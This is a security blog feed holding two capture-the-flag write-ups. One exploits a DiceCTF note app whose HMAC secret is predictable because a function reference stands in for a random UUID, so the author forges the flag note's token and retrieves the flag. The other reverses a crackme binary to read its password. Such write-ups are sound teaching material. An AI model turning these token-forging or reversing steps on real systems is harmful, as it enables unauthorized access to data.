class="cl">systemd-resolved<span class="o">=</span><span class="nb">false</span> </span></span></code></pre></div>Top 10 Docker Hardening Best Practiceshttps://zerodaywolf.sh/blog/top-10-docker-hardening-best-practices/Thu, 23 Jun 2022 01:40:58 +0530Knock Knock (DiceCTF 2022)https://zerodaywolf.sh/writeups/dicectf22-knock-knock/Sat, 05 Feb 2022 19:13:14 +0530<p>Navigating to the web app <code>knock-knock.mc.ax</code> we see a simple form with a textbox. <code>Dockerfile</code> and <code>index.js</code>, which is basically the server, is given. It&rsquo;s a simple web app.</p> <h2 id="application-logic">application logic</h2> <p>Sending a POST request to <code>/create</code> like so:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-http" data-lang="http"><span class="line"><span class="cl"><span class="nf">POST</span> <span class="nn">/create</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">2</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="o">:</span> <span class="l">knock-knock.mc.ax</span> </span></span><span class="line"><span class="cl"><span class="n">User-Agent</span><span class="o">:</span> <span class="l">Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0</span> </span></span><span class="line"><span class="cl"><span class="n">Accept</span><span class="o">:</span> <span class="l">text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</span> </span></span><span class="line"><span class="cl"><span class="n">Accept-Language</span><span class="o">:</span> <span class="l">en-US,en;q=0.5</span> </span></span><span class="line"><span class="cl"><span class="n">Accept-Encoding</span><span class="o">:</span> <span class="l">gzip, deflate</span> </span></span><span class="line"><span class="cl"><span class="n">Content-Type</span><span class="o">:</span> <span class="l">application/x-www-form-urlencoded</span> </span></span><span class="line"><span class="cl"><span class="n">Content-Length</span><span class="o">:</span> <span class="l">9</span> </span></span><span class="line"><span class="cl"><span class="n">Origin</span><span class="o">:</span> <span class="l">https://knock-knock.mc.ax</span> </span></span><span class="line"><span class="cl"><span class="n">Referer</span><span class="o">:</span> <span class="l">https://knock-knock.mc.ax/</span> </span></span><span class="line"><span class="cl"><span class="n">Upgrade-Insecure-Requests</span><span class="o">:</span> <span class="l">1</span> </span></span><span class="line"><span class="cl"><span class="n">Sec-Fetch-Dest</span><span class="o">:</span> <span class="l">document</span> </span></span><span class="line"><span class="cl"><span class="n">Sec-Fetch-Mode</span><span class="o">:</span> <span class="l">navigate</span> </span></span><span class="line"><span class="cl"><span class="n">Sec-Fetch-Site</span><span class="o">:</span> <span class="l">same-origin</span> </span></span><span class="line"><span class="cl"><span class="n">Sec-Fetch-User</span><span class="o">:</span> <span class="l">?1</span> </span></span><span class="line"><span class="cl"><span class="n">Te</span><span class="o">:</span> <span class="l">trailers</span> </span></span><span class="line"><span class="cl"><span class="n">Connection</span><span class="o">:</span> <span class="l">close</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">data=abcd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">HTTP/2 302 Found </span></span><span class="line"><span class="cl">Content-Type: text/html; charset=utf-8 </span></span><span class="line"><span class="cl">Date: Sat, 05 Feb 2022 10:14:59 GMT </span></span><span class="line"><span class="cl">Location: /note?id=785&amp;token=7e5594a47aca2fa0692275a815f269745972b03fa64cd0917b548b421394f44a </span></span><span class="line"><span class="cl">Vary: Accept </span></span><span class="line"><span class="cl">X-Powered-By: Express </span></span><span class="line"><span class="cl">Content-Length: 218 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&lt;p&gt;Found. Redirecting to &lt;a href=&#34;/note?id=785&amp;amp;token=7e5594a47aca2fa0692275a815f269745972b03fa64cd0917b548b421394f44a&#34;&gt;/note?id=785&amp;amp;token=7e5594a47aca2fa0692275a815f269745972b03fa64cd0917b548b421394f44a&lt;/a&gt;&lt;/p&gt; </span></span></code></pre></div><p>stores the value <code>abcd</code> in an array called <code>notes</code> and generates a HMAC token with which we can later retrieve this note. Keep in mind, each time a POST request like the above is sent to the web app, a new token is generated and we can retrieve only <em>that</em> note with it. An <code>id</code> is also assigned to the note upon creation which is basically a sequential identifier. This id is shown to us in the 302 redirect that comes after we send the POST request.</p> <p>Retrieving a note is done by sending a GET request to <code>/note</code> with the id and token of the note as parameters.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-http" data-lang="http"><span class="line"><span class="cl"><span class="nf">GET</span> <span class="nn">/note?id=785&amp;token=7e5594a47aca2fa0692275a815f269745972b03fa64cd0917b548b421394f44a</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">2</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="o">:</span> <span class="l">knock-knock.mc.ax</span> </span></span><span class="line"><span class="cl"><span class="n">User-Agent</span><span class="o">:</span> <span class="l">Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0</span> </span></span><span class="line"><span class="cl"><span class="n">Accept</span><span class="o">:</span> <span class="l">text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</span> </span></span><span class="line"><span class="cl"><span class="n">Accept-Language</span><span class="o">:</span> <span class="l">en-US,en;q=0.5</span> </span></span><span class="line"><span class="cl"><span class="n">Accept-Encoding</span><span class="o">:</span> <span class="l">gzip, deflate</span> </span></span><span class="line"><span class="cl"><span class="n">Origin</span><span class="o">:</span> <span class="l">https://knock-knock.mc.ax</span> </span></span><span class="line"><span class="cl"><span class="n">Referer</span><span class="o">:</span> <span class="l">https://knock-knock.mc.ax/</span> </span></span><span class="line"><span class="cl"><span class="n">Upgrade-Insecure-Requests</span><span class="o">:</span> <span class="l">1</span> </span></span><span class="line"><span class="cl"><span class="n">Sec-Fetch-Dest</span><span class="o">:</span> <span class="l">document</span> </span></span><span class="line"><span class="cl"><span class="n">Sec-Fetch-Mode</span><span class="o">:</span> <span class="l">navigate</span> </span></span><span class="line"><span class="cl"><span class="n">Sec-Fetch-Site</span><span class="o">:</span> <span class="l">same-origin</span> </span></span><span class="line"><span class="cl"><span class="n">Sec-Fetch-User</span><span class="o">:</span> <span class="l">?1</span> </span></span><span class="line"><span class="cl"><span class="n">Te</span><span class="o">:</span> <span class="l">trailers</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="g">HTTP/2 200 OK </span></span></span><span class="line"><span class="cl"><span class="g">Content-Type: text/html; charset=utf-8 </span></span></span><span class="line"><span class="cl"><span class="g">Date: Sat, 05 Feb 2022 10:34:19 GMT </span></span></span><span class="line"><span class="cl"><span class="g">Etag: W/&#34;4-gf6L/odXbD7LIkJvjleEc4KRes8&#34; </span></span></span><span class="line"><span class="cl"><span class="g">X-Powered-By: Express </span></span></span><span class="line"><span class="cl"><span class="g">Content-Length: 4 </span></span></span><span class="line"><span class="cl"><span class="g"> </span></span></span><span class="line"><span class="cl"><span class="g">abcd </span></span></span></code></pre></div><h2 id="source-code-analysis">source code analysis</h2> <p>Looking closely at the code, we see this</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-js" data-lang="js"><span class="line"><span class="cl"><span class="kr">const</span> <span class="nx">db</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">Database</span><span class="p">();</span> </span></span><span class="line"><span class="cl"><span class="nx">db</span><span class="p">.</span><span class="nx">createNote</span><span class="p">({</span> <span class="nx">data</span><span class="o">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">FLAG</span> <span class="p">});</span> </span></span></code></pre></div><p>This is what <code>createNote()</code> looks like</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-js" data-lang="js"><span class="line"><span class="cl"><span class="nx">createNote</span><span class="p">({</span> <span class="nx">data</span> <span class="p">})</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kr">const</span> <span class="nx">id</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">notes</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">this</span><span class="p">.</span><span class="nx">notes</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">data</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nx">id</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nx">token</span><span class="o">:</span> <span class="k">this</span><span class="p">.</span><span class="nx">generateToken</span><span class="p">(</span><span class="nx">id</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="p">};</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>This means that when the app is run, right after <code>db</code> is initalized, <code>createNode()</code> is run with the environment variable FLAG (the flag we need) as an argument. So, clearly the first element in the <code>notes</code> array (index 0) contains the flag that we need.</p> <p>So now we know the index at which our flag is present. What remains is the HMAC token. Let&rsquo;s take a look at the <code>generateToken()</code> function.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-js" data-lang="js"><span class="line"><span class="cl"><span class="nx">generateToken</span><span class="p">(</span><span class="nx">id</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nx">crypto</span> </span></span><span class="line"><span class="cl"> <span class="p">.</span><span class="nx">createHmac</span><span class="p">(</span><span class="s1">&#39;sha256&#39;</span><span class="p">,</span> <span class="k">this</span><span class="p">.</span><span class="nx">secret</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">.</span><span class="nx">update</span><span class="p">(</span><span class="nx">id</span><span class="p">.</span><span class="nx">toString</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="p">.</span><span class="nx">digest</span><span class="p">(</span><span class="s1">&#39;hex&#39;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>Essentially, it creates a HMAC object with the key <code>this.secret</code> and later updates the content of the HMAC with the <code>id</code> and returns the hash. The initialization of <code>this.secret</code> looks interesting</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-js" data-lang="js"><span class="line"><span class="cl"><span class="kr">class</span> <span class="nx">Database</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nx">constructor</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">this</span><span class="p">.</span><span class="nx">notes</span> <span class="o">=</span> <span class="p">[];</span> </span></span><span class="line"><span class="cl"> <span class="k">this</span><span class="p">.</span><span class="nx">secret</span> <span class="o">=</span> <span class="sb">`secret-</span><span class="si">${</span><span class="nx">crypto</span><span class="p">.</span><span class="nx">randomUUID</span><span class="si">}</span><span class="sb">`</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span></code></pre></div><p>The <code>crypto.randomUUID()</code> function is called without the parantheses which should not work. Let&rsquo;s modify <code>index.js</code> to see what <code>this.secret</code> contains. We <em>could</em> do this in a node interpreter, but I just decided to use Docker.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-diff" data-lang="diff"><span class="line"><span class="cl"> createNote({ data }) { </span></span><span class="line"><span class="cl"><span class="gi">++ console.log(&#39;this.secret: &#39;, this.secret) </span></span></span><span class="line"><span class="cl"><span class="gi"></span> const id = this.notes.length; </span></span><span class="line"><span class="cl"> this.notes.push(data); </span></span><span class="line"><span class="cl"> return { </span></span><span class="line"><span class="cl"> id, </span></span><span class="line"><span class="cl"> token: this.generateToken(id), </span></span><span class="line"><span class="cl"> }; </span></span><span class="line"><span class="cl"> } </span></span></code></pre></div><p>Build the image and run a container</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">&gt;</span> docker build -t knock-knock . </span></span><span class="line"><span class="cl"><span class="gp">&gt;</span> docker run knock-knock </span></span><span class="line"><span class="cl"><span class="go">this.secret: secret-function randomUUID(options) { </span></span></span><span class="line"><span class="cl"><span class="go"> if (options !== undefined) </span></span></span><span class="line"><span class="cl"><span class="go"> validateObject(options, &#39;options&#39;); </span></span></span><span class="line"><span class="cl"><span class="go"> const { </span></span></span><span class="line"><span class="cl"><span class="go"> disableEntropyCache = false, </span></span></span><span class="line"><span class="cl"><span class="go"> } = options || {}; </span></span></span><span class="line"><span class="cl"><span class="go"></span><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="go"> validateBoolean(disableEntropyCache, &#39;options.disableEntropyCache&#39;); </span></span></span><span class="line"><span class="cl"><span class="go"></span><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="go"> return disableEntropyCache ? getUnbufferedUUID() : getBufferedUUID(); </span></span></span><span class="line"><span class="cl"><span class="go">} </span></span></span></code></pre></div><p>This is interesting. It looks like we just get the function definition of <code>randomUUID()</code> appended to the secret key and not an actual random UUID. This means the <code>this.secret</code> key is same for all the notes, including the flag at index 0!</p> <h2 id="exploitation">exploitation</h2> <p>Since the flag is the first note to be created, we can get the token of the flag by making a small change in <code>index.js</code> and building and running the container.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-diff" data-lang="diff"><span class="line"><span class="cl"> createNote({ data }) { </span></span><span class="line"><span class="cl"> const id = this.notes.length; </span></span><span class="line"><span class="cl"> this.notes.push(data); </span></span><span class="line"><span class="cl"><span class="gi">++ console.log(this.generateToken(id)); </span></span></span><span class="line"><span class="cl"><span class="gi"></span> return { </span></span><span class="line"><span class="cl"> id, </span></span><span class="line"><span class="cl"> token: this.generateToken(id), </span></span><span class="line"><span class="cl"> }; </span></span><span class="line"><span class="cl"> } </span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">$</span> docker build -t knock-knock . </span></span><span class="line"><span class="cl"><span class="gp">$</span> docker run knock-knock </span></span><span class="line"><span class="cl"><span class="go">7bd881fe5b4dcc6cdafc3e86b4a70e07cfd12b821e09a81b976d451282f6e264 </span></span></span><span class="line"><span class="cl"><span class="go">listening on port 3000 </span></span></span></code></pre></div><p>Got the token: <code>7bd881fe5b4dcc6cdafc3e86b4a70e07cfd12b821e09a81b976d451282f6e264</code>.<br> We can now get the flag with this token and id as 0.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">&gt;</span> curl -k <span class="s1">&#39;https://knock-knock.mc.ax/note?id=0&amp;token=7bd881fe5b4dcc6cdafc3e86b4a70e07cfd12b821e09a81b976d451282f6e264&#39;</span> </span></span><span class="line"><span class="cl"><span class="go">dice{1_d00r_y0u_d00r_w3_a11_d00r_f0r_1_d00r} </span></span></span></code></pre></div><p><strong>Flag</strong>: <code>dice{1_d00r_y0u_d00r_w3_a11_d00r_f0r_1_d00r}</code></p>BigSig - Heap Overflow Vulnerability in Mozilla NSShttps://zerodaywolf.sh/blog/cve-2021-43527/Fri, 03 Dec 2021 01:40:58 +0530EZ crackmehttps://zerodaywolf.sh/writeups/ez-crackme/Sun, 31 Jan 2021 02:11:24 +0530<h2 id="file-inspection">file inspection</h2> <p>I started off by running <code>file</code> to determine the file type. The output was as follows:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">&gt;</span> file run.exe </span></span><span class="line"><span class="cl"><span class="go">run.exe: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, with debug_info, not stripped </span></span></span></code></pre></div><p>It&rsquo;s a 32-bit ELF binary. Running <code>readelf</code> on it gives us interesting information about the sections especially <code>.symtab</code> (the Symbol Table):</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">&gt;</span> readelf -a run.exe </span></span><span class="line"><span class="cl"><span class="go">Section Headers: </span></span></span><span class="line"><span class="cl"><span class="go"> [Nr] Name Type Addr Off Size ES Flg Lk Inf Al </span></span></span><span class="line"><span class="cl"><span class="go"> [ 0] NULL 00000000 000000 000000 00 0 0 0 </span></span></span><span class="line"><span class="cl"><span class="go"> [ 1] .text PROGBITS 08049000 001000 000045 00 AX 0 0 16 </span></span></span><span class="line"><span class="cl"><span class="go"> [ 2] .data PROGBITS 0804a000 002000 00001d 00 WA 0 0 4 </span></span></span><span class="line"><span class="cl"><span class="go"> [ 3] .debug_aranges PROGBITS 00000000 00201d 000020 00 0 0 1 </span></span></span><span class="line"><span class="cl"><span class="go"> [ 4] .debug_info PROGBITS 00000000 00203d 00003a 00 0 0 1 </span></span></span><span class="line"><span class="cl"><span class="go"> [ 5] .debug_abbrev PROGBITS 00000000 002077 00001b 00 0 0 1 </span></span></span><span class="line"><span class="cl"><span class="go"> [ 6] .debug_line PROGBITS 00000000 002092 00004a 00 0 0 1 </span></span></span><span class="line"><span class="cl"><span class="go"> [ 7] .symtab SYMTAB 00000000 0020dc 000140 10 8 16 4 </span></span></span><span class="line"><span class="cl"><span class="go"> [ 8] .strtab STRTAB 00000000 00221c 000076 00 0 0 1 </span></span></span><span class="line"><span class="cl"><span class="go"> [ 9] .shstrtab STRTAB 00000000 002292 00005c 00 0 0 1 </span></span></span><span class="line"><span class="cl"><span class="go"></span><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="go">Symbol table &#39;.symtab&#39; contains 20 entries: </span></span></span><span class="line"><span class="cl"><span class="go"> Num: Value Size Type Bind Vis Ndx Name </span></span></span><span class="line"><span class="cl"><span class="go"> 0: 00000000 0 NOTYPE LOCAL DEFAULT UND </span></span></span><span class="line"><span class="cl"><span class="go"> 1: 08049000 0 SECTION LOCAL DEFAULT 1 </span></span></span><span class="line"><span class="cl"><span class="go"> 2: 0804a000 0 SECTION LOCAL DEFAULT 2 </span></span></span><span class="line"><span class="cl"><span class="go"> 3: 00000000 0 SECTION LOCAL DEFAULT 3 </span></span></span><span class="line"><span class="cl"><span class="go"> 4: 00000000 0 SECTION LOCAL DEFAULT 4 </span></span></span><span class="line"><span class="cl"><span class="go"> 5: 00000000 0 SECTION LOCAL DEFAULT 5 </span></span></span><span class="line"><span class="cl"><span class="go"> 6: 00000000 0 SECTION LOCAL DEFAULT 6 </span></span></span><span class="line"><span class="cl"><span class="go"> 7: 00000000 0 FILE LOCAL DEFAULT ABS code.asm </span></span></span><span class="line"><span class="cl"><span class="go"> 8: 0804900e 0 NOTYPE LOCAL DEFAULT 1 _start.goodjob </span></span></span><span class="line"><span class="cl"><span class="go"> 9: 08049026 0 NOTYPE LOCAL DEFAULT 1 _start.wrong </span></span></span><span class="line"><span class="cl"><span class="go"> 10: 0804903c 0 NOTYPE LOCAL DEFAULT 1 _start.end </span></span></span><span class="line"><span class="cl"><span class="go"> 11: 0804a000 1 OBJECT LOCAL DEFAULT 2 password </span></span></span><span class="line"><span class="cl"><span class="go"> 12: 0804a008 1 OBJECT LOCAL DEFAULT 2 goodjobText </span></span></span><span class="line"><span class="cl"><span class="go"> 13: 0000000e 0 NOTYPE LOCAL DEFAULT ABS goodjobLen </span></span></span><span class="line"><span class="cl"><span class="go"> 14: 0804a016 1 OBJECT LOCAL DEFAULT 2 nope </span></span></span><span class="line"><span class="cl"><span class="go"> 15: 00000007 0 NOTYPE LOCAL DEFAULT ABS nopeLen </span></span></span><span class="line"><span class="cl"><span class="go"> 16: 08049000 0 NOTYPE GLOBAL DEFAULT 1 _start </span></span></span><span class="line"><span class="cl"><span class="go"> 17: 0804a01d 0 NOTYPE GLOBAL DEFAULT 2 __bss_start </span></span></span><span class="line"><span class="cl"><span class="go"> 18: 0804a01d 0 NOTYPE GLOBAL DEFAULT 2 _edata </span></span></span><span class="line"><span class="cl"><span class="go"> 19: 0804a020 0 NOTYPE GLOBAL DEFAULT 2 _end </span></span></span></code></pre></div><h2 id="disassembly">disassembly</h2> <p>Moving on to disassembling the program, I used <code>objdump</code>.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">&gt;</span> objdump -M intel -d run.exe </span></span><span class="line"><span class="cl"><span class="go">run.exe: file format elf32-i386 </span></span></span><span class="line"><span class="cl"><span class="go"></span><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="go">Disassembly of section .text: </span></span></span><span class="line"><span class="cl"><span class="go"></span><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="go">08049000 &lt;_start&gt;: </span></span></span><span class="line"><span class="cl"><span class="go"> 8049000: 5b pop ebx </span></span></span><span class="line"><span class="cl"><span class="go"> 8049001: 5b pop ebx </span></span></span><span class="line"><span class="cl"><span class="go"> 8049002: 5b pop ebx </span></span></span><span class="line"><span class="cl"><span class="go"> 8049003: a1 00 a0 04 08 mov eax,ds:0x804a000 </span></span></span><span class="line"><span class="cl"><span class="go"> 8049008: 3b 03 cmp eax,DWORD PTR [ebx] </span></span></span><span class="line"><span class="cl"><span class="go"> 804900a: 74 02 je 804900e &lt;_start.goodjob&gt; </span></span></span><span class="line"><span class="cl"><span class="go"> 804900c: eb 18 jmp 8049026 &lt;_start.wrong&gt; </span></span></span><span class="line"><span class="cl"><span class="go"></span><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="go">0804900e &lt;_start.goodjob&gt;: </span></span></span><span class="line"><span class="cl"><span class="go"> 804900e: b8 04 00 00 00 mov eax,0x4 </span></span></span><span class="line"><span class="cl"><span class="go"> 8049013: bb 01 00 00 00 mov ebx,0x1 </span></span></span><span class="line"><span class="cl"><span class="go"> 8049018: b9 08 a0 04 08 mov ecx,0x804a008 </span></span></span><span class="line"><span class="cl"><span class="go"> 804901d: ba 0e 00 00 00 mov edx,0xe </span></span></span><span class="line"><span class="cl"><span class="go"> 8049022: cd 80 int 0x80 </span></span></span><span class="line"><span class="cl"><span class="go"> 8049024: eb 16 jmp 804903c &lt;_start.end&gt; </span></span></span><span class="line"><span class="cl"><span class="go"></span><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="go">08049026 &lt;_start.wrong&gt;: </span></span></span><span class="line"><span class="cl"><span class="go"> 8049026: b8 04 00 00 00 mov eax,0x4 </span></span></span><span class="line"><span class="cl"><span class="go"> 804902b: bb 01 00 00 00 mov ebx,0x1 </span></span></span><span class="line"><span class="cl"><span class="go"> 8049030: b9 16 a0 04 08 mov ecx,0x804a016 </span></span></span><span class="line"><span class="cl"><span class="go"> 8049035: ba 07 00 00 00 mov edx,0x7 </span></span></span><span class="line"><span class="cl"><span class="go"> 804903a: cd 80 int 0x80 </span></span></span><span class="line"><span class="cl"><span class="go"></span><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="go">0804903c &lt;_start.end&gt;: </span></span></span><span class="line"><span class="cl"><span class="go"> 804903c: b8 01 00 00 00 mov eax,0x1 </span></span></span><span class="line"><span class="cl"><span class="go"> 8049041: 31 db xor ebx,ebx </span></span></span><span class="line"><span class="cl"><span class="go"> 8049043: cd 80 int 0x80 </span></span></span></code></pre></div><p>It&rsquo;s a simple program which starts off by comparing an initialized variable in the data segment (ds) with an argument. Based on the result of the <code>cmp</code> (compare) operation, it executes the <code>write</code> syscall to write a message to <code>stdout</code> (file descriptor 1). So now, the C program would look something like this:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="n">arg</span> <span class="o">==</span> <span class="o">*</span><span class="mh">0x804a000</span><span class="p">){</span> </span></span><span class="line"><span class="cl"> <span class="nf">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="o">*</span><span class="mh">0x804a008</span><span class="p">,</span> <span class="mh">0xe</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="k">else</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="o">*</span><span class="mh">0x804a016</span><span class="p">,</span> <span class="mh">0x7</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>The Linux Man page for the <a href="https://man7.org/linux/man-pages/man2/write.2.html">write</a> syscall explains each argument. But it&rsquo;s still pretty self explanatory.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="nf">write</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">count</span><span class="p">);</span> </span></span></code></pre></div><h2 id="exploitation">exploitation</h2> <p>We now know where to look for our secret string. Firing up <code>radare2</code>:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">&gt;</span> r2 run.exe </span></span><span class="line"><span class="cl"><span class="go">[0x08049000]&gt; s 0x804a000 </span></span></span><span class="line"><span class="cl"><span class="go">[0x0804a000]&gt; px </span></span></span><span class="line"><span class="cl"><span class="go">- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a000 5034 3535 7730 7264 596f 7520 476f 7420 P455w0rdYou Got </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a010 5468 6973 210a 5772 6f6e 6721 0aff ffff This!.Wrong!.... </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a020 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a030 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a040 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a050 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a060 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a070 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a080 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a090 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a0a0 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a0b0 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a0c0 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a0d0 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a0e0 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span><span class="line"><span class="cl"><span class="go">0x0804a0f0 ffff ffff ffff ffff ffff ffff ffff ffff ................ </span></span></span></code></pre></div><p>Looks like we found our key! <code>P455w0rd</code>. Running the binary with <code>P455w0rd</code> as an argument:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">&gt;</span> ./run.exe P455w0rd </span></span><span class="line"><span class="cl"><span class="go">You Got This! </span></span></span></code></pre></div><p>However, the compare instruction is done with a DWORD, i.e 4 bytes. So the key is <code>P455</code>.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">&gt;</span> ./run.exe P455 </span></span><span class="line"><span class="cl"><span class="go">You Got This! </span></span></span></code></pre></div>